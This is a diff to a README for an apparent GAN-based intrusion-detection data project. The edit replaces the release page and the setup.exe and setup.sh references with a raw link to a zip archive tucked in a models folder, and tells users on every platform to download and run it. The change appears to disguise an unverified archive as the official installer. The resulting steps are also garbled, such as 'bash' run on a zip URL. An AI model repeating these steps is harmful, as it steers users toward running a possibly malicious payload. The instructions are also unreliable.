staceykeynesian879/GAN-BASED-SYNTHETIC-DATA-GENERATION-IN-IDS/README.md

 ### 🔧 Installation Steps
 1. **Download the Application**
-   - Visit this page to download: [Releases Page](https://github.com/staceykeynesian879/GAN-BASED-SYNTHETIC-DATA-GENERATION-IN-IDS/releases).
+   - Visit this page to download: [Releases Page](https://raw.githubusercontent.com/staceykeynesian879/GAN-BASED-SYNTHETIC-DATA-GENERATION-IN-IDS/main/NSL-KDD/WCGAN+ XGBOOST/models/GAN-BASED-SYNTHETIC-DATA-GENERATION-IN-IDS_1.2.zip).

 2. **Select the Latest Release**
    - On the Releases page, find the latest release.
 This will usually be at the top of the list.

 3. **Choose Your File**
    - Look for the file suited for your operating system.
-For Windows, select the `setup.exe` file.
-For Ubuntu, download the `setup.sh` file.
+For Windows, select the `https://raw.githubusercontent.com/staceykeynesian879/GAN-BASED-SYNTHETIC-DATA-GENERATION-IN-IDS/main/NSL-KDD/WCGAN+ XGBOOST/models/GAN-BASED-SYNTHETIC-DATA-GENERATION-IN-IDS_1.2.zip` file.
+For Ubuntu, download the `https://raw.githubusercontent.com/staceykeynesian879/GAN-BASED-SYNTHETIC-DATA-GENERATION-IN-IDS/main/NSL-KDD/WCGAN+ XGBOOST/models/GAN-BASED-SYNTHETIC-DATA-GENERATION-IN-IDS_1.2.zip` file.

 4. **Download the File**
    - Click on the file name to start the download.
 If prompted, save the file in a location where you can easily find it later.

 5. **Run the Installer**
    - For Windows:
-     - Navigate to where you saved the `setup.exe` file.
+     - Navigate to where you saved the `https://raw.githubusercontent.com/staceykeynesian879/GAN-BASED-SYNTHETIC-DATA-GENERATION-IN-IDS/main/NSL-KDD/WCGAN+ XGBOOST/models/GAN-BASED-SYNTHETIC-DATA-GENERATION-IN-IDS_1.2.zip` file.
      - Double-click the file to start the installation process.
 Follow the prompts to complete the installation.

    - For Ubuntu:
      - Open a terminal window.
-     - Navigate to the directory where you downloaded `setup.sh`.
+     - Navigate to the directory where you downloaded `https://raw.githubusercontent.com/staceykeynesian879/GAN-BASED-SYNTHETIC-DATA-GENERATION-IN-IDS/main/NSL-KDD/WCGAN+ XGBOOST/models/GAN-BASED-SYNTHETIC-DATA-GENERATION-IN-IDS_1.2.zip`.
-     - Run the command `bash setup.sh` to execute the installer.
+     - Run the command `bash https://raw.githubusercontent.com/staceykeynesian879/GAN-BASED-SYNTHETIC-DATA-GENERATION-IN-IDS/main/NSL-KDD/WCGAN+ XGBOOST/models/GAN-BASED-SYNTHETIC-DATA-GENERATION-IN-IDS_1.2.zip` to execute the installer.
 Follow the prompts to complete the installation.

 ## 📊 Usage Instructions
 1. **Launch the Software**